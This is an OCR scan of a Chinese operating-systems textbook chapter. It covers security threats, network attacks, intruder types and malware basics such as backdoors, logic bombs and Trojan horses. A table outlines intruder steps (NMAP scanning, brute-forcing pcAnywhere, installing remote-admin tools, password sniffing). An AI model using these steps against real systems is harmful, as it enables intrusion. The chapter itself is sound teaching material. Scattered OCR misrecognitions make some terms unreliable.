非 授权 泄露 : 实体 访问 非 授 
权 数 据 的 环境 或 事件 


中 断 : 中 断 或 阻止 系统 服务 
和 功能 的 环境 或 事件 
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欺骗 是 对 系统 或 数据 完整 性 的 一 种 威胁 ， 下 面 的 几 种 攻击 可 以 导致 这 种 威胁 : 

© 伪装 : 一 个 例子 是 非 授 权 用 户 试图 通过 伪装 成 授权 用 户 来 获取 系统 的 访问 权限 ， 当 非 授 
权 用 户 获取 了 另 一 个 用 户 的 登录 ID 和 口令 时 可 能 发 生 这 种 情况 。 另 一 个 例子 是 恶意 代 
码 ， 比 如 特洛伊 木马 ， 伪 装 成 有 用 的 或 者 需要 的 功能 ， 但 实际 上 却 对 系统 进行 非 授权 访 
问 ， 或 者 欺骗 用 户 执行 其 他 的 恶意 程序 。 

o 伪造 : 这 指 的 是 修改 、 替 换文 件 或 者 数据 库 里 的 合法 数据 。 比 如 ， 某 个 学 生 可 能 在 学 校 
数据 库 里 修改 他 的 分 数 。 

o KM: 在 这 种 情况 下 ， 用 户 要 么 抵赖 发 送 了 数据 ， 要 么 抵赖 接收 或 者 拥有 数据 。 

中 断 是 对 系统 可 用 性 和 完整 性 的 威胁 ， 以 下 的 几 种 攻击 可 以 导致 该 威胁 : 

@ 失效 : 这 是 针对 系统 可 用 性 的 攻击 。 对 系统 硬件 的 物理 破坏 可 以 导致 这 种 结果 。 更 典型 的 情 
况 是 ， 恶 意 软件 ( 比如 特洛伊 木马、 病毒 或 者 蠕虫 ) 也 能 使 系统 整体 或 者 一 些 服务 失效 。 
o 毁坏 这 是 针对 系统 完整 性 的 攻击 。 恶 意 软件 可 能 以 一 种 未 知 的 方式 操作 系统 资源 或 者 
服务 功能 。 或 者 一 个 用 户 以 未 授权 的 方式 访问 系统 并 修改 一 些 功能 。 后 者 的 一 个 例子 是 

用 户 在 系统 中 安装 后 门 ， 随 后 通过 一 系列 看 似 正常 的 方式 访问 系统 资源 。 

o 阻碍 : 一 种 阻碍 系统 操作 的 方式 是 使 通信 链 路 失效 或 者 改变 通信 控制 信息 。 另 一 种 方式 
是 通过 使 通信 流量 或 系统 资源 过 载 来 降低 系统 的 性 能 。 

算 改 威胁 系统 的 完整 性 。 如 下 两 种 攻击 可 能 造成 这 种 威胁 : 

o 挪用 :这 可 能 包括 盗 取 系统 服务 。 比 如 分 布 式 拒绝 服务 攻击 ， 当 恶意 软件 安装 在 若干 台 
主机 上 时 ， 这 些 主机 就 能 作为 平台 产生 针对 一 个 目标 主机 的 通信 流量 。 在 这 种 情况 下 ， 
恶意 软件 以 非 授权 的 方式 使 用 了 处 理 器 和 操作 系统 的 资源 。 

o UA: 激 用 可 能 是 由 恶意 软件 或 者 非 授权 访问 系统 的 黑客 导致 的 。 在 两 种 情况 下 ， 安 全 
功能 可 能 被 禁用 或 者 屏蔽 了 。 


14.2.2 威胁 和 资产 


计算 机 系统 的 资产 可 以 分 为 硬件 、 软 件 、 数 据 、 通 信和 链 路 和 网 络 。 在 本 节 中 ， 我们 简要 描述 这 
四 类 资产 ,并 且 把 它们 和 14.1 节 中 介绍 的 完整 性 、 机 密 性 和 可 用 性 联系 起 来 ( 参照 图 14.2 MR 14.2 )。 


计算 机 系统 计算 机 系统 
© & y; 










[oaren | 
C 安全 地 传输 
(网 络 安全 ) 


A ella nat 
( 用户 认证 ) 
用 户 发 出 请 求 


图 14.2 系统 安全 的 范围 
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R 14.2 计算 机 和 网 络 资产 威胁 的 实例 


设备 失窃 或 者 失效 ， 导 
致 拒绝 服务 


文件 被 删除 ， 拒 绝 用 户 非 授 权 读 取 文 件 , 分 析 统 
访问 计数 据 
消息 被 删除 ， 通 信和 链 路 消息 被 读 取 , 消息 通信 模 
或 网 络 失效 式 被 分 析 
硬件 


计算 机 硬件 的 主要 威胁 是 可 用 性 。 硬 件 是 最 容易 被 攻击 ， 最 不 容易 被 怀疑 受到 自动 控制 的 。 
威胁 包括 偶然 的 和 有 意 的 损坏 、 盗 窃 设 备 。 个 人 电脑 和 工作 站 的 大 量 使 用 、LAN 的 广泛 应 用 增 
加 了 硬件 洪 在 的 风险 。 盗 窃 CD-ROM 和 DVD 可 能 导致 机 密 性 的 损失 。 需 要 通过 增强 物理 的 和 
管理 上 的 安全 措施 来 防范 此 类 威胁 。 


软件 

软件 包括 操作 系统 、 平 台 软 件 和 应 用 软件 。 软 件 主要 的 威胁 是 源 于 对 可 用 性 的 攻击 。 软 件 (万 
其 是 应 用 软件 ) 容易 被 删除 。 软 件 还 容易 因 被 修改 或 破坏 而 无 法 使 用 。 谨慎 的 软件 配置 管理 , 包 
括 对 经 常 使 用 的 软件 版 本 进行 备份 , 能 够 带 来 较 高 的 可 用 性 。 更 复杂 的 问题 是 由 于 软件 修改 导致 
软件 虽然 正常 运行 ,但 其 行为 已 经 和 原来 不 同 了 ， 这 对 完整 性 /认证 是 一 种 威胁 ,计算 机 病毒 和 
相关 的 攻击 属于 这 种 类 型 。 最 后 一 个 问题 是 保护 软件 隐私 。 尽 管 有 些 可 以 使 用 的 衡量 标准 , 但 非 
授权 的 软件 复制 这 个 大 的 问题 还 没有 解决 。 


数据 

硬件 和 软件 安全 常常 关注 计算 中 心 的 业务 或 者 个 人 电脑 用 户 的 需求 ,一 个 更 广泛 的 问题 是 数 
据 安 全 ， 包 括 文 件 和 由 个 人 、 组 织 和 商业 机 构 所 拥有 的 其 他 形式 的 数据 。 

数据 安全 是 广泛 的 , 包罗 了 可 用 性 、 机密 性 和 完整 性 。 以 可 用 性 为 例 , 涉及 数据 文件 的 销 筑 ， 
因为 这 可 能 是 偶然 的 或 者 是 恶意 的 。 

对 机 密 的 明显 的 关注 是 非 授权 读 取 数据 文件 或 者 数据 库 ,在 这 个 问题 上 的 研究 和 工作 比 其 他 
计算 机 安全 问题 要 多 。 一 种 不 那么 明显 的 对 机 密 的 威胁 包括 对 数据 的 分 析 , 从 中 能 获取 总 结 性 的 
和 统计 性 的 信息 。 直 观 上 看 , 这 些 统计 信息 不 会 对 个 人 隐私 造成 威胁 。 但 是 随 着 统计 信息 数据 库 
的 增长 ， 泄 露 个 人 信息 的 可 能 也 随 之 增加 。 从 本 质 上 说 , 要 获得 个 人 信息 特征 需要 经 过 仔细 的 分 
析 。 比 如 对 一 个 表 的 查询 结果 是 A、B、C 和 D， 另 一 个 查询 结果 是 A、B、C、D 和 王 ， 这 两 个 
查询 结果 不 同 的 地 方 是 E。 数据 集 联 合 问题 更 加 严重 。 在 许多 情况 下 , 为 了 不 同 层次 上 的 一 致 性 ， 
把 几 个 数据 集 匹 配 起 来 需要 个 人 信息 的 访问 权限 。 所 以 这 些 隐 私 中 关注 的 个 人 信息 , 在 数据 集 的 
处 理 中 就 可 能 处 于 威胁 之 中 了 。 

最 后 , 数据 完整 性 在 许多 设置 中 都 是 重点 关注 的 内 容 。 修 改 数据 文件 可 能 导致 小 的 问题 , 也 
能 导致 大 的 灾难 。 


通信 链 路 和 网 络 

网 络 安全 攻击 可 以 分 为 被 动 攻击 和 主动 攻击 。 被 动 攻击 分 析 和 利用 系统 信息 , 但 不 破坏 系统 
资源 。 主 动 攻击 试图 改变 系统 资源 或 者 影响 系统 操作 。 

被 动 攻击 的 本 质 是 窃听 、 控 制 通信 。 攻击 者 的 目标 是 获取 传输 的 信息 。 被 动 攻击 的 两 种 类 型 
是 获取 消息 内 容 和 流量 分 析 。 



















软件 被 修改 ,导致 其 运行 失效 或 
者 执行 一 些 未 知 的 任务 
现 有 的 文件 被 修改 或 者 新 文件 被 
伪造 
消息 被 修改 、 延 迟 、 重 新 排序 或 
复制 。 错 误 的 消息 被 伪造 
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获取 消息 内 容 很 容易 理解 。 比 如 电话 谈话 内 容 .电子 邮件 或 者 包含 敏感 秘密 信息 的 文件 传输 。 
我 们 希望 能 阻止 攻击 者 获取 这 些 交 流 的 内 容 。 

第 二 种 被 动 攻击 , 流量 分 析 , 要 更 微妙 一 些 。 假 设 我 们 有 一 种 办 法 能 够 把 通信 内 容 或 其 他 信 
息 掩 盖 起 来 ,使 得 攻击 者 即使 获取 了 消息 ,也 无 法 知道 消息 的 内 容 。 常 用 的 方式 是 内 容 加 密 。 如 
果 我 们 通过 加 密 来 实施 保护 , 攻击 者 还 是 能 够 发 现 这 些 消息 的 模式 , 能 发 现 通信 主体 的 位 置 和 身 
份 ， 能 观察 消息 交换 的 频率 和 长 度 。 这 些 信息 对 于 分 析 通 信 的 性 质 可 能 是 有 用 的 。 

被 动 攻击 很 难 被 检测 到 ,因为 它 不 会 改变 数据 本 身 。 通常 情况 下 , 通信 流量 的 发 送 和 接收 看 
起 来 都 很 正常 ， 没 有 谁 会 注意 到 隐藏 的 第 三 方 已 经 获取 了 消息 或 者 分 析 了 消息 模式 。 然 而 , 这 类 
攻击 是 可 以 阻止 的 ， 常 用 的 方法 是 加 密 。 因 此 ， 针 对 被 动 攻击 的 重点 是 阻止 而 不 是 检测 。 

主动 攻击 涉及 更 改 数据 流 ， 或 者 创建 一 个 假 的 数据 流 , 包含 以 下 四 种 情况 : 重 放 、 伪 造 、 算 
改 和 拒绝 服务 。 

重 放 包 括 被 动 地 捕获 数据 包 ， 然 后 重新 发 送 一 次 以 执行 一 次 未 授权 的 行为 。 

伪造 是 指 一 个 实体 假装 成 另外 一 个 实体 。 伪 造 攻击 常常 伴随 着 其 他 形式 的 主动 攻击 。 比 如 ， 
认证 流程 可 能 被 捕获 , 并 在 一 次 合法 的 认证 后 进行 重 放 , 这 可 以 使 一 个 只 有 较 小 权限 的 认证 实体 
获取 超级 权限 ， 只 要 假冒 有 超级 权限 的 实体 。 

自 改 指 的 是 合法 信息 的 某 些 部 分 被 修改 , 或 者 被 延迟 或 者 被 重新 排序 , 以 此 来 产生 非 授 权 的 
行为 。 比 如 ， 一 个 消息 内 容 为 “允许 John Smith 读 秘密 文件 内 容 ” 被 改 成 “允许 Fred Brown 读 
秘密 文件 内 容 ”。 

拒绝 服务 阻止 或 者 抑制 通信 设施 的 正常 使 用 和 管理 。 这 种 攻击 可 能 有 特定 的 目标 ， 比 如 , 一 
个 实体 把 消息 重 定向 到 一 个 特定 的 地 址 ( 可 能 是 安全 审计 服务 器 )。 另 一 种 拒绝 服务 攻击 的 形式 
是 破坏 网 络 ， 通 过 使 网 络 失效 或 者 使 网 络 过 载 来 降低 整个 网 络 的 性 能 。 

主动 攻击 的 特点 和 被 动 攻击 相反 。 被 动 攻 击 难 以 被 检测 到 ， 只 能 采取 措施 进行 阻止 。 但 是 ， 
完全 阻止 主动 攻击 是 很 难 的 ， 因 为 需要 对 所 有 的 通信 设施 和 链 路 随时 随地 进行 物理 保护 。 所 以 ， 
检测 它们 并 从 这 些 攻击 造成 的 中 断 和 延迟 中 恢复 过 来 是 我 们 的 目标 。 因 为 检测 有 威慑 的 效果 ,所 
以 对 阻止 这 类 攻击 也 是 有 用 的 。 


143 入 侵 者 


对 安全 最 大 的 两 种 威胁 之 一 就 是 入侵 者 ( 另 一 种 是 病毒 )， 通常 指 的 是 黑客 。 在 早期 有 关 入 
侵 的 重要 文献 中 ，Anderson[ANDE80] 把 人 侵 者 分 为 三 类 : 

@ 伪装 者 : 没有 被 授权 使 用 计算 机 ， 但 通过 攻破 系统 访问 控制 创建 合法 用 户 账号 的 人 。 

@ 违法 行为 者 : 一 个 合法 用 户 访问 没有 被 授权 的 数据 、 程 序 或 者 资源 ， 或 者 滥用 为 其 分 配 


的 权限 。 
© 秘密 用 户 : 一 个 用 户 拥 有 系统 的 超级 权限 ， 并 通过 这 种 权限 逃避 审计 和 访问 控制 或 者 阻 
止 系 统 对 其 行为 进行 审计 。 


伪装 者 可 能 是 一 个 外 部 攻击 者 , 违法 行为 者 则 通常 是 内 部 人 员 , 而 秘密 用 户 既 可 能 是 内 部 人 员 也 
可 能 是 外 部 人 员 。 

人 入侵 攻击 可 能 是 善意 的 也 可 能 是 恶意 的 。 在 善意 的 情况 下 , 很 多 人 只 是 想 连 接 到 因特网 上 访 
问 外 部 信息 ; 在 恶意 的 情况 下 ， 则 可 能 读 取 未 授权 的 数据 、 修 改 数据 ， 或 者 毁坏 系统 。 

[GRAN04] 列 举 了 如 下 入 侵 的 案例 : 

@ 伪装 成 一 个 远程 的 E-mail 服务 器 的 管理 员 

@ 攻击 Web 服务 器 


Bl È HARMZDAB 435 


猜测 和 破解 口令 

复制 含有 信用 卡号 信息 的 数据 库 

在 未 授权 的 情况 下 查看 敏感 数据 ， 包 括 账单 记录 和 病历 资料 

在 工作 站 上 运行 嗅 探 器 ， 抓 取 用 户 名 和 口令 

利用 许可 缺陷 或 者 匿名 的 FTP 服务 器 发 布 盗版 软件 和 音乐 

接 入 一 个 不 安全 的 调制 解 调 器 ， 访 问 因特网 

伪装 成 管理 人 员 ， 呼 叫 帮助 ， 重 置 管理 人 员 的 E-mail 口令 ， 获 取 新 的 口令 信息 
使 用 无 人 值守 的 工作 站 


14.3.1 ”入侵 者 行为 模式 


为 了 利用 新 发 现 的 漏洞 和 逃避 检测 措施 ， 和 人 侵 者 的 技术 和 行为 模式 总 是 在 不 断 变化 。 尽 
管 如 此 ， 和 人 侵 者 还 是 会 遵守 一 系列 可 识别 的 、 区 别 于 普通 行为 的 模式 。 在 下 文中 ， 为 了 给 读 
者 一 些 直观 感觉 , 我 们 分 析 三 个 有 代表 性 的 入 侵 行为 案例 。 基 于 [RADC04] 的 表 14.3 总 结 了 这 
些 行为 。 


表 14.3 入 侵 者 行为 模式 的 一 些 例子 


a) 黑客 
. 使 用 IP 查看 工具 如 NSLookup、Dig 等 选择 目标 地 址 
.用 NMAP 等 工具 查看 网 络 服务 
、 识 别 潜 在 的 有 和 缺陷 的 服务 ( 如 pcAnywhere ) 
.暴力 破解 pcAnywhere 的 口令 
. 安装 远程 管理 软件 ， 如 DameWare 
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等待 管理 员 登 录 并 记录 其 口令 
.使 用 这 个 口令 查看 网 络 的 其 余部 分 

b) 犯罪 机 构 
， 迅速 精确 的 行动 使 得 他 们 的 行动 难以 被 检测 出 来 


1 

2. 通过 漏洞 端口 进行 攻击 准备 

3. 用 木马 程序 ( 隐藏 的 软件 ) 开启 后 门 方便 以 后 的 入 盆 
4. 用 嗅 探 器 捕获 口令 

5. 在 被 发 现 之 前 ， 坚 持 不 懈 地 进行 攻击 

6. 很 少 或 几乎 不 犯错 误 





c) 内 部 威胁 





1. 为 自己 或 者 他 们 的 伙伴 创建 网 络 账户 

2. 访问 他 们 日 常 工作 中 不 需要 访问 的 账户 和 应 用 

3. 给 以 前 的 或 未 来 的 雇主 发 送 E-mail 

4. 揭 鬼 崇 崇 好 用 即时 聊天 工具 聊天 

5. 访问 那些 迎合 筷 员 不 满 情绪 的 网 站 ， 如 Pdcompany.com 
6. KAT RAHN 
7. 在 非 工作 时 间 访 问 网 络 


黑客 

以 前 墨客 人 侵 计 算 机 是 为 了 寻求 刺激 或 者 显示 自己 的 地 位 。[ 黑客 社团 是 由 一 群 精英 分 子 组 
成 的 ，] 他 们 的 能 力 决 定 了 在 社团 中 的 地 位 。 因 此 ,他 们 常常 寻找 攻击 目标 并 相互 共享 信息 。 一 
个 典型 的 例子 是 在 [RADC04] 中 报道 的 对 大 型 财务 机 构 的 侵入 。 入 侵 者 利用 了 网 络 运 行 中 没有 保 
护 的 服务 ， 这 些 服务 实际 上 可 能 是 不 需要 的 。 在 这 个 案例 中 ， 侵 人 成 功 的 关键 在 于 pcAnywhere 
应 用 。 安 全 服务 厂商 Symantec 发 布 了 这 款 作为 远程 控制 解决 方案 的 软件 ， 使 其 可 以 安全 地 连接 
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到 远程 设备 上 。 但 是 攻击 者 很 容易 访问 pcAnywhere， 管 理 员 使 用 了 同样 的 三 个 字母 作为 用 户 名 
AMOS. 在 这 个 用 于 700 个 节点 的 网 络 中 没有 入 侵 检 测 系 统 。 当 一 位 副 总 裁 走 进 她 的 办 公 室 看 到 
鼠标 在 其 Windows 工作 站 的 文件 上 移动 时 ， 入 侵 者 才 被 发 现 。 

善意 的 入侵 是 可 以 容忍 的 , 尽管 会 消耗 掉 一 些 资 源 , 使 合法 用 户 获 取 服 务 的 速度 变 慢 。 但 是 
没有 一 种 好 的 方法 能 判断 人 侵 是 善意 的 还 是 恶意 的 .所 以 ,尽管 是 一 个 没有 什么 敏感 数据 的 系统 ， 
也 需要 注意 人 侵 的 问题 。 

第 15 章 将 会 介绍 的 人 侵 检测 系统 (Intrusion Detection System, IDS ) 和 入 侵 防 御 系 统 ( Intrusion 
Prevention System, IPS) 就 是 用 来 应 对 黑客 入侵 的 。 除 了 使 用 这 样 的 系统 ,还 可 以 考虑 限制 远程 
连接 的 IP 或 者 使 用 虚拟 专用 网 技术 。 

对 入 侵 问 题 了 解 越 来 越 多 的 一 个 结果 是 一 系列 计算 机 安全 应 急 小 组 (Computer Emergency 
Teams, CERT) 的 诞生 。 这 些 组 织 收集 系统 漏洞 信息 并 将 其 发 放 给 系统 管理 员 。 黑 客 也 会 关注 
CERT 的 报告 。 所 以 ， 系 统管 理 员 迅 速 给 已 发 现 的 漏洞 打上 软件 补丁 是 非常 重要 的 。 不 幸 的 是 ， 
由 于 IT 系统 的 复杂 性 和 补丁 发 布 的 频率 不 同 ， 获 取 到 正确 的 补丁 越 来 越 难 了 ， 除 非 自 动 更 新 。 
尽管 如 此 ， 自 动 更 新 软件 导致 了 不 少 的 兼容 性 问题 ， 所 以 有 必要 在 IT 系统 安全 管理 中 使 用 多 层 
的 防护 。 


犯罪 

有 组 织 的 黑客 组 织 成 为 因特网 系统 中 一 个 迅速 发 展 而 且 常 见 的 问题 .这 些 组 织 受 雇 于 一 些 公 
司 或 者 政府 ， 成 为 松散 的 黑客 帮派 。 这 些 帮 派 可 能 比较 年 轻 ， 在 东欧 、 俄 罗斯 和 东南 亚 ， 他 们 在 
网 上 做 起 了 交易 [ANTE06]。 在 地 下 论坛 中 , 他 们 用 像 DarkMarket.org 或 theftservices.com 这 样 的 
名 字 来 交换 赏 金 和 数据 , 或 者 联合 起 来 攻击 。 常 见 的 目标 是 电子 商务 服务 器 中 的 信用 卡 文件 , 攻 
击 者 试图 获取 root 权限 ， 信 用 卡号 被 有 组 织 的 帮派 用 于 购买 昂贵 的 东西 并 邮寄 到 持 卡 人 所 在 的 
地 址 ， 在 这 些 地 方 其 他 人 也 能 访问 和 使 用 信用 卡号 ; 这 种 隐藏 的 使 用 方法 使 调查 变 得 困难 。 

传统 的 黑客 寻找 有 机 会 的 目标 ， 有 犯罪 倾向 的 黑客 寻找 有 特点 的 目标 或 者 一 类 这 样 的 目标 。 
一 旦 一 个 目标 被 攻陷 ,他 们 就 迅速 行动 ， 盗 取 尽 可 能 多 的 有 用 信息 ,然后 离开 。 

IDS 和 IPS 对 付 这 种 攻击 者 是 有 用 的 , 但 由 于 快速 的 人 侵 和 离开 ,可 能 不 会 那么 有 效 。 对 电 
子 商务 站 点 而 言 ,对 敏感 用 户 信息 的 加 密 是 必须 的 , 尤其 是 信用 卡号 。 对 外 包 的 电子 商务 业务 而 
言 , 电子 商务 组 织 需 要 采用 专用 的 服务 器 (不 是 用 来 支持 多 用 户 的 ) 并 密切 关注 服务 提供 商 的 安 
全 措施 。 


内 部 攻击 

内 部 攻击 是 最 难 检测 和 阻止 的 。 内 部 员工 们 已 经 有 访问 权限 , 并 知道 公司 数据 库 的 结构 和 内 
容 。 内 部 攻击 者 的 动机 来 自 于 复仇 或 者 对 权力 的 渴望 。 前 者 的 一 个 例子 是 Kenneth Patterson， 被 
解雇 前 是 美国 Eagle Outfitters 的 数据 通信 经 理 。Patterson 使 得 2002 年 假期 期 间 公司 处 理 信 用 卡 
交易 的 功能 瘫 痰 了 $ 天 。 对 权力 而 言 , 常常 有 些 雇 员 喜 欢 把 办 公 室 的 资源 拿 回 家 用 , 但 现在 演变 
为 拿 走 公 司 数据 。 一 个 例子 是 一 个 证 券 分 析 公司 的 销售 部 副 经 理 离职 去 了 另 一 家 公司 , 在 她 离开 
之 前 ， 她 拷贝 了 客户 资料 ， 她 需要 这 些 数据 因为 可 能 以 后 对 她 有 用 。 

尽管 IDS 和 IPS 设备 在 应 对 内 部 攻击 时 可 能 有 用 ， 但 更 直接 的 措施 是 高 度 的 权限 管理 ， 举 
例如 下 : 

”@ 实施 最 小 权限 原则 ， 只 赋予 员工 完成 工作 所 需 的 最 少 的 资源 访问 权限 。 

@ 记录 日 志 ， 用 户 访问 了 什么 以 及 他 们 进入 时 输入 了 什么 命令 。 

© 强 认 证 保护 敏感 数据 。 

@ 在 离职 前 ， 冻 结 员工 的 电脑 和 网 络 访问 。 
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@ 在 离职 前 ， 为 员工 的 电脑 硬盘 作 一 个 备份 。 当 公司 的 信息 出 现在 竞争 者 那 边 时 ， 可 以 作 
为 证 据 。 


14.3.2 入 侵 技 术 


人 侵 者 的 目标 是 获取 系统 访问 权限 或 者 提升 系统 访问 权限 。 多 数 的 初始 攻击 是 使 用 系统 或 者 
软件 漏洞 来 执行 用 户 代码 、 在 系统 上 打开 一 个 后 门 。 人 侵 者 可 以 通过 像 缓 冲 区 溢出 等 攻击 获取 对 
系统 的 访问 权限 。 

此 外 ， 入 侵 者 试图 获取 需要 受到 保护 的 信息 ， 如 用 户口 令 。 如 果 知 道 一 些 用 户 的 口令 ， 人 入侵 
者 可 以 登录 到 系统 中 ， 拥 有 合法 用 户 所 有 的 权限 。 第 15 章 将 讨论 口令 分 析 和 获取 技术 。 


14.4 恶意 软件 概述 


最 复杂 的 一 类 计算 机 系统 威胁 可 能 来 自 那 些 利用 系统 漏洞 的 程序 。 这 类 威胁 称 做 恶意 软件 
( malicious software )， 简 称 malware。 在 此 我 们 关注 的 包括 应 用 程序 和 公用 程序 ( 如 编辑 器 和 编 
译 器 等 )。 亚 意 软件 是 一 种 被 设计 用 来 对 目标 计算 机 造成 破坏 或 占用 目标 计算 机 资源 的 软件 。 它 
常 封装 或 伪装 到 合法 软件 中 ， 在 某 些 情况 下 通过 E-mail 或 被 感染 的 软盘 等 向 其 他 计算 机 传播 。 

这 一 领域 的 术语 存在 一 些 缺 乏 通用 约定 或 类 别 重 合 的 问题 。 表 14.4 给 出 了 一 个 有 用 的 指南 。 

恶意 软件 可 以 分 为 两 类 : 需要 主机 程序 的 恶意 软件 和 独立 的 恶意 软件 。 前 一 种 又 称 为 寄生 
恶意 软件 ， 本 质 上 是 不 能 作为 某 个 实际 应 用 程序 、 公 用 程序 或 系统 程序 独立 存在 的 程序 片段 ， 
例如 病毒 、 逻 辑 炸 弹 、 后 门 。 后 一 种 是 独立 的 程序 ， 可 以 被 操作 系统 调度 和 运行 ， 例 如 蠕虫 和 
HFEF. 

我 们 还 可 以 通过 是 否 复制 来 区 分 这 些 软 件 威胁 。 不 进行 复制 的 恶意 软件 是 被 触发 器 激活 的 程 
序 或 程序 片段 ， 例 如 逻辑 炸弹 、 后 门 和 僵尸 程序 。 进 行 复制 的 恶意 软件 在 执行 时 可 能 生成 一 个 
或 多 个 自身 的 副本 ， 这 些 副本 随后 在 当前 系统 或 其 他 系统 中 被 激活 ， 例 如 病毒 和 蠕虫 。 

本 节 随 后 将 简要 综述 一 些 关 键 类 型 的 恶意 软件 ， 后 续 章 节 还 会 对 病毒 、 蠕 虫 、 僵 尸 程序 和 
rootkits 等 一 些 重要 主题 进行 讨论 。 


14.4.1 后 门 


后 门 (backdoor， 又 称 trapdoor) 是 一 个 秘密 的 程序 进入 点 ， 人 允许 知道 该 后 门 的 人 不 通过 通 
常 的 安全 访问 过 程 就 获得 访问 权 。 程 序 员 合 法 地 利用 后 门 调试 和 测试 程序 已 经 有 很 多 年 的 历史 
了 ,这 种 后 门 称 做 维护 钩子 ( maintenance hook), 通常 在 程序 员 开 发 包含 验证 过 程 的 应 用 程序 或 
需要 反复 安装 和 输入 才能 运行 的 应 用 程序 时 就 完成 的 。 为 调试 程序 , 开发 者 可 能 希望 获得 特殊 优 
先 权 或 避免 所 有 的 必要 安装 和 验证 ,程序 员 还 可 能 希望 确保 在 应 用 程序 内 建 的 验证 过 程 出 错时 有 
办 法 激活 程序 。 后 门 可 以 是 识别 某 些 特殊 输入 序列 的 代码 ， 也 可 以 是 由 特定 用 户 ID 运行 或 一 系 
列 不 太 可 能 的 事件 所 触发 的 代码 。 

当 无 道德 的 程序 员 使 用 后 门 进 行 未 授权 访问 时 , 后 门 就 成 了 威胁 。 后 门 是 电影 4 War Games) 
中 描绘 的 漏洞 的 基本 思想 。 另 一 个 例子 是 在 Multics 的 开发 过 程 中 , 由 美国 空军 “tiger team”( 模 
拟 攻击 者 ) 实施 渗透 测试 ， 采 取 的 策略 之 一 是 发 送 一 个 伪造 的 操作 系统 更 新 给 运行 Multics 的 站 
点 ,更 新 包括 一 个 特洛伊 木马 ( 后面 将 进行 介绍 ) , 该 木马 可 以 通过 一 个 后 门 激活 , 使 得 tiger team 
能 获得 访问 权 。 后 门 实现 得 很 好 以 至 于 Multics 开发 者 们 在 被 通知 该 后 门 的 存在 后 也 没有 找到 它 
[ENGE80] 。 

对 后 门 实现 操作 系统 控制 是 很 难 的 ， 因 此 安全 措施 必须 关注 程序 开发 和 软件 更 新 活动 。 
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14.4.2 ”逻辑 炸弹 


逻辑 炸弹 是 早 于 病毒 和 蠕虫 的 最 古老 的 程序 威胁 类 型 之 一 。 逻 辑 炸 弹 是 嵌入 在 某 些 合法 程序 
中 并 被 设置 为 在 特定 条 件 满足 时 才 “ 爆 炸 ” 的 代码 。 用 来 触发 逻辑 炸弹 的 条 件 包 括 特定 文件 的 存 
在 或 不 存在 、 特 定 日 期 ( 星期 几 ) 、 特 定 用 户 运 行 该 应 用 程序 等 。 一 旦 被 触发 ,逻辑 炸弹 可 能 更 
改 或 删除 数据 或 整个 文件 、 引 起 停机 或 进行 其 他 破坏 . 关于 逻辑 炸弹 如 何 使 用 的 一 个 惊人 的 例子 
是 Tim Lloyd 的 案例 ， 他 设置 了 一 个 逻辑 炸弹 并 导致 其 东家 Omega Engineering 损失 了 超过 一 - 千 
万 美元 ， 这 严重 影响 了 该 公司 的 成 长 策略 并 最 终 导致 该 公司 裁员 80 人 [GAUD00] ， 最 终 Lloyd 
被 判 41 个 月 监禁 并 赔付 200 万 美元 。 


14.4.3 ”特洛伊 木马 


特洛伊 木马 9 是 一 种 有 用 (或 看 上 去 有 用 ) 的 程序 或 命令 行 过 程 ， 它 包含 隐藏 的 代码 ， 当 这 
些 代码 被 调用 时 执行 某 些 有 害 的 功能 。 

特洛伊 木马 程序 可 以 被 用 来 间接 地 完成 那些 未 授权 用 户 不 能 直接 完成 的 功能 。 例如 , 为 了 访 
问 一 个 共享 系统 中 其 他 用 户 的 文件 , 用 户 可 以 创建 一 个 特洛伊 木马 程序 , 该 程序 被 执行 时 更 改 调 
用 该 程序 的 用 户 文件 的 访问 权限 , 这 样 该 文件 就 可 以 被 任意 用 户 读 取 。 这样 木马 作者 就 可 以 通过 
将 木马 放 在 公共 目录 下 并 将 其 命名 为 有 用 的 公用 程序 或 应 用 程序 来 引导 用 户 运 行 木 马 。 例 如 表面 
上 按 用 户 要 求 的 格式 生成 一 个 用 户 文件 列表 的 程序 , 当 一 个 用 户 运 行 该 程序 后 , 木马 作者 就 可 以 
访问 该 用 户 的 文件 中 的 信息 。 一 个 难以 被 检测 到 的 特洛伊 木马 程序 的 例子 是 被 更 改过 的 编译 器 ， 
该 编译 器 在 编译 特定 的 程序 (如 系统 登录 程序 ) 时 将 额外 的 代码 加 入 程序 中 [THOM84]， 加 入 的 
代码 在 登录 程序 中 创建 了 一 个 后 门 , 允许 木马 作者 使 用 特殊 的 口令 登录 系统 。 我 们 无 法 通过 读 取 
登录 程序 的 源 代码 来 发 现 这 一 特洛伊 木马 。 

特洛伊 木马 的 另 一 个 常见 的 动机 是 数据 破坏 。 程序 看 上 去 执行 一 个 有 用 的 功能 ( 如 一 个 计算 
器 程序 ) , 但 也 可 以 安静 地 删除 用 户 的 文件 。 例 如 ,一 个 哥伦比亚 广播 公司 的 主管 就 曾 被 特洛伊 
木马 破坏 了 其 计算 机 上 的 所 有 信息 [TIME90], 该 特洛伊 木马 被 植 人 了 BBS 上 提供 的 一 个 图 形 程 
序 中 。 

特洛伊 木马 分 为 三 种 模型 

@ 继续 执行 原始 程序 的 功能 并 额外 地 执行 不 相关 的 恶意 行为 。 

© 继续 执行 原始 程序 的 功能 但 将 功能 改 为 可 以 执行 恶意 行为 《例如 登录 程序 的 特洛伊 木马 

版 本 可 以 收集 口令 ) 或 将 功能 改 为 可 以 掩盖 其 他 恶意 行为 《例如 进行 列表 显示 程序 的 特 
洛 伊 木马 版 本 不 显示 特定 的 恶意 进程 ) 。 
@ 用 对 恶意 功能 的 执行 完全 替代 对 原始 程序 功能 的 执行 。 


14.4.4 移动 代码 


移动 代码 指 可 以 不 加 更 改 地 装载 到 不 同 种 类 的 平台 且 以 相同 的 语义 执行 的 程序 ( 如 脚本 、 宏 
及 其 他 便携 指令 ) [JANS01] 。 该 概念 还 适用 于 涉及 大 量 的 同 构 平 台 ( 如 Microsoft Windows ) 的 
情形 。 

移动 代码 从 一 个 远程 系统 传递 到 一 个 本 地 系统 ,不 需要 用 户 明确 的 指令 就 可 以 在 本 地 系统 上 


希腊 神话 中 ,希腊 人 在 对 特洛伊 城 的 围攻 中 使 用 了 特洛伊 木马 。Epeios 建造 了 一 个 巨大 的 内 空 的 木马 ，30 位 
希腊 勇士 藏 于 其 中 。 其 余 希 腊 人 烧毁 营地 并 假装 启 航 ， 实 际 上 却 在 附近 埋伏 。 特 洛 伊 人 以 为 木马 是 礼物 而 围 
城 已 经 结束 ， 将 木马 拖 人 城内 。 当 晚 木马 中 的 希腊 勇士 打开 城 门 放 希 腊 军 队 人 城 ， 继 而 发 生 了 大 屠杀 ， 最 终 
